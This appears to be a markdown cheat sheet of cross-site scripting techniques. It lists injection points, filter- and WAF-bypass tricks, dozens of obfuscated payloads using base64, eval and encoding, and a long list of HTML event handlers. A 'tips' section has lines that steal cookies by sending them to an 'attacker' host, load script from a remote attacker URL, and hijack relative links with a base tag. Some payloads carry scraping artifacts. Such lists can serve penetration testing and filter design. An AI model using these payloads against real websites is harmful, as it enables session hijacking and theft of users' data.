xss.md

injection points

script tags
attributes with event handler value (onload, onerror, ...)

2.1. some here
2.2. to discover others: search for events accepted by the app (use this list) and try to evolve to an xss
2.3. alert(1) == location=window.atob`amF2YXNjcmlwdDphbGVydCgxKQoK`

attributes with URL value

3.1. embed/src, iframe/src, object/data, a/href, button/formaction, form/action more in https://www.w3.org/TR/2017/REC-html52-20171214/fullindex.html#attributes-table
3.2. javascript:alert(1) =~ data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

bypass wafs

some characters to separate attributes are: %09 %0a %0c %0d %20 %2f

removing space

use a separator character

<imgonerror='alert(1)'src
<iframe/src=javascript:alert(1)

avoiding characters

html encode inside attribute values
eval
base64
use grave accent (remove parentheses)

<img/src/
<img onerror=alert&#040cookie&#041 src
<img onerror=eval.call`${`alert\x281\u0029`}` src>
<svg onload=location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<svg/'https://attacker/1.js'>
<xss style="opacity:0;position:fixed;font-size:999px;top:0;left:0;" onpointerover="alert(1)">test</xss>
 
<embed src=javascript:location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==


<script>location=window.atob`amF2YXNjcmlwdDphbGVydCgxMTEp`</script>
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
<script>eval.call`${'alert\x28document.cookie\x29'}`</script>
<script>x=new DOMMatrix;matrix=alert;x.a=1;location='javascript'+':'+x</script>

adding extra code

put < > " with a separator character inside the tag

<svg </onload=alert(1)"

event handlers

<!-- onerror -->       <img onerror=alert(1) src
<!-- onfocus -->       <input/autofocus/ class="pl-kos">> 
<!-- onload -->        <svg onload=alert(1)>
<!-- onloadstart -->   <audio/src/ class="pl-kos">>
<!-- onmouseover -->   <newtag style=font-size:900px onmouseover=alert(1)>explosion
<!-- onpointerover --> <xsstag style=font-size:900px onpointerover=alert(1)>explosion

tips

reflected to dom-based eval(location.hash.slice(1))
steal cookie <img src 'http://attacker/'+cookie>
change page relative links <base href="http://attacker/">
bypass filter js keywords, change to []()!+: http://www.jsfuck.com/

references

TODO

onactivate
onafterprint
onafterscriptexecute
onanimationcancel
onanimationend
onanimationiteration
onanimationstart
onauxclick
onbeforeactivate
onbeforecopy
onbeforecut
onbeforedeactivate
onbeforepaste
onbeforeprint
onbeforescriptexecute
onbeforeunload
onbegin
onblur
onbounce
oncanplay
oncanplaythrough
onchange
onclick
onclose
oncontextmenu
oncopy
oncut
ondblclick
ondeactivate
ondrag
ondragend
ondragenter
ondragleave
ondragover
ondragstart
ondrop
onend
onended
onerror
onfinish
onfocus
onfocusin
onfocusout
onfullscreenchange
onhashchange
oninput
oninvalid
onkeydown
onkeypress
onkeyup
onload
onloadeddata
onloadedmetadata
onloadend
onloadstart
onmessage
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
onmozfullscreenchange
onpageshow
onpaste
onpause
onplay
onplaying
onpointerdown
onpointerenter
onpointerleave
onpointermove
onpointerout
onpointerover
onpointerrawupdate
onpointerup
onpopstate
onreadystatechange
onrepeat
onreset
onresize
onscroll
onsearch
onseeked
onseeking
onselect
onstart
onsubmit
ontimeupdate
ontoggle
ontouchend
ontouchmove
ontouchstart
ontransitioncancel
ontransitionend
ontransitionrun
onunhandledrejection
onunload
onvolumechange
onwaiting
onwebkitanimationend
onwebkitanimationstart
onwebkittransitionend
onwheel

morkin1792/xss.md